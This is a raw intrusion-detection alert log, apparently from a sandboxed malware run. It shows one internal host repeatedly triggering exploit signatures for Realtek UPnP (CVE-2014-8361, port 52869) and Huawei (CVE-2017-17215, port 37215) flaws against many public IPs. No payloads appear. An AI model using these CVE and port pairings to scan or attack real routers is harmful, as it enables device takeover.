                                      07/20/24-23:01:46.483452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4204252869192.168.2.23150.183.171.74
                                      07/20/24-23:01:49.034246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4321052869192.168.2.23112.175.144.226
                                      07/20/24-23:01:08.572196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5043052869192.168.2.2354.250.134.170
                                      07/20/24-23:01:48.065745TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614851252869192.168.2.2387.107.52.197
                                      07/20/24-23:01:49.775041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3679252869192.168.2.2341.172.236.0
                                      07/20/24-23:01:20.592479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25304252869192.168.2.23118.135.71.210
                                      07/20/24-23:01:42.662466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613420652869192.168.2.23130.184.173.22
                                      07/20/24-23:01:45.426290TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24169852869192.168.2.23223.51.209.65
                                      07/20/24-23:01:08.679677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708652869192.168.2.23103.179.244.2
                                      07/20/24-23:01:41.205247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4310652869192.168.2.23104.24.229.93
                                      07/20/24-23:00:59.185032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.23197.113.51.118
                                      07/20/24-23:01:07.026812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738237215192.168.2.23126.151.179.206
                                      07/20/24-23:01:46.485082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5667652869192.168.2.23120.189.67.125
                                      07/20/24-23:01:06.994337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682037215192.168.2.23197.179.239.59
                                      07/20/24-23:01:20.591862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25882052869192.168.2.238.133.200.251
                                      07/20/24-23:01:59.096276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24362052869192.168.2.23120.123.66.167
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258037215192.168.2.2341.141.154.207
                                      07/20/24-23:01:43.190670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5190052869192.168.2.2317.241.55.92
                                      07/20/24-23:01:01.632331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615159052869192.168.2.2363.150.57.125
                                      07/20/24-23:01:14.296756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532637215192.168.2.23202.108.222.223
                                      07/20/24-23:01:31.331748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24018652869192.168.2.2384.102.198.205
                                      07/20/24-23:01:20.596401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4595652869192.168.2.23178.124.248.177
                                      07/20/24-23:01:04.760964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613961052869192.168.2.23119.8.134.128
                                      07/20/24-23:01:41.339597TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614877052869192.168.2.2340.200.215.102
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966637215192.168.2.23198.55.153.11
                                      07/20/24-23:01:43.044693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5313452869192.168.2.23159.4.8.31
                                      07/20/24-23:01:14.049602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758837215192.168.2.23222.200.88.35
                                      07/20/24-23:01:41.542563TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616033852869192.168.2.23162.207.42.25
                                      07/20/24-23:01:42.000471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615619652869192.168.2.23199.90.7.168
                                      07/20/24-23:01:55.974605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5297452869192.168.2.23187.223.52.236
                                      07/20/24-23:01:42.813695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25403252869192.168.2.23196.168.75.104
                                      07/20/24-23:01:10.856294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614298652869192.168.2.232.221.152.25
                                      07/20/24-23:01:31.331748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4285052869192.168.2.23113.130.121.87
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721437215192.168.2.2341.104.14.193
                                      07/20/24-23:01:45.683188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613738052869192.168.2.23198.213.74.132
                                      07/20/24-23:01:02.102095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615982252869192.168.2.23193.135.58.157
                                      07/20/24-23:01:20.598095TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24788652869192.168.2.23113.195.103.231
                                      07/20/24-23:01:58.146170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4184452869192.168.2.23166.102.172.20
                                      07/20/24-23:01:50.759828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597652869192.168.2.23130.253.20.234
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228437215192.168.2.23157.197.135.159
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919837215192.168.2.2341.107.194.160
                                      07/20/24-23:01:43.813001TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614539052869192.168.2.23169.195.139.119
                                      07/20/24-23:01:57.787786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613840652869192.168.2.2360.14.147.228
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711637215192.168.2.2341.155.124.93
                                      07/20/24-23:01:08.667964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988252869192.168.2.23115.225.187.157
                                      07/20/24-23:01:43.580365TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25599052869192.168.2.2394.120.34.76
                                      07/20/24-23:01:53.372532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5720852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:48.842529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288852869192.168.2.2336.12.14.153
                                      07/20/24-23:01:50.848726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5542452869192.168.2.23100.28.35.63
                                      07/20/24-23:01:08.589759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978452869192.168.2.23218.167.11.188
                                      07/20/24-23:01:44.963815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614280252869192.168.2.23203.128.56.168
                                      07/20/24-23:01:48.021704TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25375252869192.168.2.23210.173.156.193
                                      07/20/24-23:01:49.412594TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613747852869192.168.2.2320.158.48.199
                                      07/20/24-23:01:31.974837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.23110.11.201.127
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059437215192.168.2.23157.81.54.196
                                      07/20/24-23:01:42.790680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4056252869192.168.2.23108.54.73.191
                                      07/20/24-23:01:20.591862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872052869192.168.2.235.142.247.218
                                      07/20/24-23:01:41.682135TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24286052869192.168.2.238.157.181.46
                                      07/20/24-23:01:11.816277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412437215192.168.2.2362.86.14.116
                                      07/20/24-23:01:42.304767TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613478652869192.168.2.23219.196.66.69
                                      07/20/24-23:01:00.654988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058437215192.168.2.2341.215.110.81
                                      07/20/24-23:01:14.111381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017237215192.168.2.23195.93.174.118
                                      07/20/24-23:01:45.074222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24811452869192.168.2.23112.102.125.164
                                      07/20/24-23:01:56.768240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4352052869192.168.2.23210.84.36.218
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337837215192.168.2.23157.223.84.102
                                      07/20/24-23:01:43.121284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614379452869192.168.2.23161.25.16.6
                                      07/20/24-23:01:41.290518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614008652869192.168.2.2395.50.29.160
                                      07/20/24-23:01:44.765093TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4687052869192.168.2.2360.118.116.115
                                      07/20/24-23:01:58.067320TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23507452869192.168.2.23108.147.254.33
                                      07/20/24-23:01:42.129029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613493052869192.168.2.23155.71.120.47
                                      07/20/24-23:01:42.509004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4288052869192.168.2.2385.101.71.143
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938437215192.168.2.23197.59.190.80
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875437215192.168.2.2385.88.209.175
                                      07/20/24-23:01:03.149410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3442452869192.168.2.23208.190.62.115
                                      07/20/24-23:02:40.696155TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614044252869192.168.2.235.105.178.105
                                      07/20/24-23:01:45.233561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3905452869192.168.2.232.166.49.173
                                      07/20/24-23:01:08.594120TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25840252869192.168.2.2344.70.248.184
                                      07/20/24-23:01:08.578116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3437452869192.168.2.2325.222.248.206
                                      07/20/24-23:01:08.589760TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25169052869192.168.2.23190.34.49.149
                                      07/20/24-23:01:08.619598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23636852869192.168.2.2365.114.239.111
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938037215192.168.2.23157.177.146.54
                                      07/20/24-23:01:42.527234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24888052869192.168.2.2371.169.30.84
                                      07/20/24-23:02:06.806210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4419852869192.168.2.23147.8.193.70
                                      07/20/24-23:01:08.565610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4373652869192.168.2.23119.187.229.164
                                      07/20/24-23:01:31.333070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25610052869192.168.2.23221.42.114.149
                                      07/20/24-23:01:43.852550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4184652869192.168.2.2332.76.174.48
                                      07/20/24-23:01:10.996987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3966652869192.168.2.2327.116.111.15
                                      07/20/24-23:01:54.345402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809652869192.168.2.2393.193.20.196
                                      07/20/24-23:01:48.133778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615675252869192.168.2.23195.45.218.64
                                      07/20/24-23:01:41.488676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613663852869192.168.2.2389.174.70.107
                                      07/20/24-23:01:51.107223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5657252869192.168.2.2342.135.139.61
                                      07/20/24-23:01:41.323363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615765252869192.168.2.2353.13.47.10
                                      07/20/24-23:00:57.221550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782637215192.168.2.2341.76.26.43
                                      07/20/24-23:01:43.425298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868652869192.168.2.23162.125.127.147
                                      07/20/24-23:01:51.014531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614323452869192.168.2.23120.123.66.167
                                      07/20/24-23:01:47.163877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3323852869192.168.2.23175.15.219.89
                                      07/20/24-23:01:02.380657TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4781852869192.168.2.23120.187.5.172
                                      07/20/24-23:01:02.113054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261237215192.168.2.23178.236.15.67
                                      07/20/24-23:01:08.609855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23865852869192.168.2.23112.103.96.49
                                      07/20/24-23:01:46.146350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711052869192.168.2.23183.90.49.252
                                      07/20/24-23:01:14.296756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307037215192.168.2.23177.10.233.116
                                      07/20/24-23:01:43.135090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901052869192.168.2.23150.76.139.116
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227037215192.168.2.23197.196.115.165
                                      07/20/24-23:01:51.916673TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613571652869192.168.2.23124.74.75.114
                                      07/20/24-23:01:00.633275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911437215192.168.2.23197.196.77.201
                                      07/20/24-23:01:49.170008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24085652869192.168.2.2390.144.20.22
                                      07/20/24-23:00:59.178062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459637215192.168.2.2341.119.22.219
                                      07/20/24-23:01:41.303669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4999252869192.168.2.23152.188.24.161
                                      07/20/24-23:01:08.562013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5478452869192.168.2.2390.243.193.156
                                      07/20/24-23:01:44.415588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5325652869192.168.2.23133.125.214.226
                                      07/20/24-23:01:43.071126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614471652869192.168.2.23166.254.78.153
                                      07/20/24-23:01:47.038105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758252869192.168.2.23117.120.22.241
                                      07/20/24-23:01:00.633810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507237215192.168.2.23157.230.177.125
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055437215192.168.2.23182.56.199.136
                                      07/20/24-23:01:47.943232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386252869192.168.2.23213.170.177.158
                                      07/20/24-23:01:24.832675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924252869192.168.2.2324.104.161.240
                                      07/20/24-23:01:42.442441TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616025452869192.168.2.2399.233.112.21
                                      07/20/24-23:01:02.093903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.2371.240.106.220
                                      07/20/24-23:01:50.188348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104052869192.168.2.23178.64.121.40
                                      07/20/24-23:01:41.156801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387052869192.168.2.23165.210.119.115
                                      07/20/24-23:01:25.848287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4227652869192.168.2.2319.16.79.3
                                      07/20/24-23:01:58.995803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479252869192.168.2.2337.223.190.191
                                      07/20/24-23:01:54.545885TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615912252869192.168.2.2341.28.215.223
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049437215192.168.2.23197.97.192.157
                                      07/20/24-23:01:57.169212TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25614852869192.168.2.2317.24.227.79
                                      07/20/24-23:01:21.931985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123237215192.168.2.2341.240.0.142
                                      07/20/24-23:01:43.906354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365252869192.168.2.23207.223.163.108
                                      07/20/24-23:01:47.700893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524052869192.168.2.23216.145.37.57
                                      07/20/24-23:01:34.048618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384237215192.168.2.23157.5.66.172
                                      07/20/24-23:02:07.984371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4225652869192.168.2.2367.242.12.13
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430637215192.168.2.23136.52.234.90
                                      07/20/24-23:01:08.554229TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24579852869192.168.2.23189.75.86.189
                                      07/20/24-23:02:12.682460TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5834052869192.168.2.2385.40.245.195
                                      07/20/24-23:00:57.221482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015037215192.168.2.2341.226.72.201
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599037215192.168.2.2341.84.70.245
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188837215192.168.2.2341.52.100.172
                                      07/20/24-23:01:42.672378TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24401852869192.168.2.2391.196.45.114
                                      07/20/24-23:02:03.882859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615964252869192.168.2.23111.184.238.202
                                      07/20/24-23:01:08.684499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24440452869192.168.2.23167.134.108.32
                                      07/20/24-23:01:02.076704TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614440452869192.168.2.234.131.130.12
                                      07/20/24-23:01:42.196522TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25325852869192.168.2.23140.117.188.131
                                      07/20/24-23:01:49.877061TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614208452869192.168.2.2314.190.237.146
                                      07/20/24-23:01:55.262010TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614079852869192.168.2.23178.199.253.233
                                      07/20/24-23:02:01.391563TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615248052869192.168.2.2353.205.5.201
                                      07/20/24-23:01:31.974514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941037215192.168.2.2341.187.164.155
                                      07/20/24-23:02:43.591633TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613316852869192.168.2.23205.251.62.147
                                      07/20/24-23:01:41.236294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614182252869192.168.2.2335.204.82.212
                                      07/20/24-23:01:45.547484TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5340252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428637215192.168.2.2341.115.147.179
                                      07/20/24-23:01:03.107449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544452869192.168.2.23183.49.28.217
                                      07/20/24-23:01:43.455918TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24765252869192.168.2.23145.102.1.140
                                      07/20/24-23:01:25.020591TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615895052869192.168.2.23174.51.233.233
                                      07/20/24-23:01:41.303669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615297652869192.168.2.23193.229.91.171
                                      07/20/24-23:01:49.207937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081452869192.168.2.23197.4.127.82
                                      07/20/24-23:01:00.634497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.23197.17.32.247
                                      07/20/24-23:01:20.098209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696437215192.168.2.23197.39.168.92
                                      07/20/24-23:01:04.051104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858837215192.168.2.23197.18.10.40
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802437215192.168.2.23163.95.87.60
                                      07/20/24-23:01:41.882275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24633652869192.168.2.2334.33.43.162
                                      07/20/24-23:01:42.761962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4884052869192.168.2.23205.59.131.231
                                      07/20/24-23:02:08.826483TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3829852869192.168.2.2359.115.71.173
                                      07/20/24-23:01:46.571223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3495052869192.168.2.23132.171.123.209
                                      07/20/24-23:01:02.389453TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614013852869192.168.2.2349.39.36.55
                                      07/20/24-23:01:52.053251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23777052869192.168.2.2313.165.214.181
                                      07/20/24-23:01:56.536207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5073252869192.168.2.23209.219.111.180
                                      07/20/24-23:01:31.321189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569652869192.168.2.23106.220.99.163
                                      07/20/24-23:01:48.021704TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23812652869192.168.2.23114.19.125.68
                                      07/20/24-23:01:51.275864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23473452869192.168.2.2337.189.26.199
                                      07/20/24-23:01:42.430595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5259252869192.168.2.2390.133.16.151
                                      07/20/24-23:01:52.742499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5805652869192.168.2.23217.180.101.231
                                      07/20/24-23:01:44.611556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4315252869192.168.2.23128.114.73.170
                                      07/20/24-23:01:42.142802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615858252869192.168.2.231.132.71.9
                                      07/20/24-23:01:45.096837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4976252869192.168.2.2361.169.227.46
                                      07/20/24-23:00:57.221248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404037215192.168.2.2341.242.31.133
                                      07/20/24-23:01:59.676169TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614927852869192.168.2.23165.63.9.134
                                      07/20/24-23:01:34.044223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671437215192.168.2.2341.139.79.186
                                      07/20/24-23:01:08.563416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4221852869192.168.2.23172.95.79.32
